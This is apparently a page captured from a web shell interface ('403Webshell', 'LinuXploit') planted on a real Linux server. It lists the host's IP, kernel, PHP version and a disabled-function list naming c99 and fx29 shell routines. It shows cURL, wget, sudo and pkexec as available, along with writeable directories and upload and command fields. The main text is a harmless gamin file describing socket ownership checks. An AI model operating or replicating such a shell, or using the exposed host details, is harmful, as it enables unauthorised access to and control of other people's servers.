403Webshell
Server IP : 103.119.228.120  /  Your IP : 3.145.38.67
Web Server : Apache
System : Linux v8.techscape8.com 3.10.0-1160.119.1.el7.tuxcare.els2.x86_64 #1 SMP Mon Jul 15 12:09:18 UTC 2024 x86_64
User : nobody ( 99)
PHP Version : 5.6.40
Disable Function : shell_exec,symlink,system,exec,proc_get_status,proc_nice,proc_terminate,define_syslog_variables,syslog,openlog,closelog,escapeshellcmd,passthru,ocinum cols,ini_alter,leak,listen,chgrp,apache_note,apache_setenv,debugger_on,debugger_off,ftp_exec,dl,dll,myshellexec,proc_open,socket_bind,proc_close,escapeshellarg,parse_ini_filepopen,fpassthru,exec,passthru,escapeshellarg,escapeshellcmd,proc_close,proc_open,ini_alter,popen,show_source,proc_nice,proc_terminate,proc_get_status,proc_close,pfsockopen,leak,apache_child_terminate,posix_kill,posix_mkfifo,posix_setpgid,posix_setsid,posix_setuid,dl,symlink,shell_exec,system,dl,passthru,escapeshellarg,escapeshellcmd,myshellexec,c99_buff_prepare,c99_sess_put,fpassthru,getdisfunc,fx29exec,fx29exec2,is_windows,disp_freespace,fx29sh_getupdate,fx29_buff_prepare,fx29_sess_put,fx29shexit,fx29fsearch,fx29ftpbrutecheck,fx29sh_tools,fx29sh_about,milw0rm,imagez,sh_name,myshellexec,checkproxyhost,dosyayicek,c99_buff_prepare,c99_sess_put,c99getsource,c99sh_getupdate,c99fsearch,c99shexit,view_perms,posix_getpwuid,posix_getgrgid,posix_kill,parse_perms,parsesort,view_perms_color,set_encoder_input,ls_setcheckboxall,ls_reverse_all,rsg_read,rsg_glob,selfURL,dispsecinfo,unix2DosTime,addFile,system,get_users,view_size,DirFiles,DirFilesWide,DirPrintHTMLHeaders,GetFilesTotal,GetTitles,GetTimeTotal,GetMatchesCount,GetFileMatchesCount,GetResultFiles,fs_copy_dir,fs_copy_obj,fs_move_dir,fs_move_obj,fs_rmdir,SearchText,getmicrotime
MySQL : ON |  cURL : ON |  WGET : ON |  Perl : ON |  Python : ON |  Sudo : ON |  Pkexec : ON
Directory :  /usr/local/ssl/share/doc/gamin-0.1.10/

Upload File :
current_dir [ Writeable] document_root [ Writeable]

 

Command :


[ Back ]     

Current File : /usr/local/ssl/share/doc/gamin-0.1.10/socket.txt
If there is abstract socket support:
====================================

  use them as "\0/tmp/fam-$USER-$GAM_CLIENT_ID"
  They are not mapped on the filesystem, no attack is possible that way.
  The client and the server checks on the first '\0' byte received that
  the other side is of the same UID

If there is no abstract socket support:
=======================================

Server side:
------------

start:
  try to create /tmp/fam-$USER using mkdir('/tmp/fam-$USER', 007)
  if error:
      make a stat() on it
      if doesn't exist:
          return failure to create
      if user is not getuid() or mode is not 007 or type is not dir:
          try to unlink()
	  if error:
	      exit with error.
	  if success:
	      goto start:
 
  do the socket()/bind() on /tmp/fam-$USER/fam-$GAM_CLIENT_ID
  
Client side:
------------

  make a stat on /tmp/fam-$USER
  if doesn't exist:
      return failure to create should start the server
  if user is not getuid() or mode is not 007 or type is not dir:
      try to unlink()
      if error:
          exit with error.
      if success:
          return failure should start the server
  make a stat on /tmp/fam-$USER/fam-$GAM_CLIENT_ID
  if doesn't exist:
      return failure to create should start the server
  if user is not getuid() or type is not socket:
      try to unlink()
      if error:
          exit with error.
      if success:
          return failure should start the server

  do the socket()/connect() on /tmp/fam-$USER/fam-$GAM_CLIENT_ID

  The client and the server checks on the first '\0' byte received that
  the other side is of the same UID.

Youez - 2016 - github.com/yon3zu
LinuXploit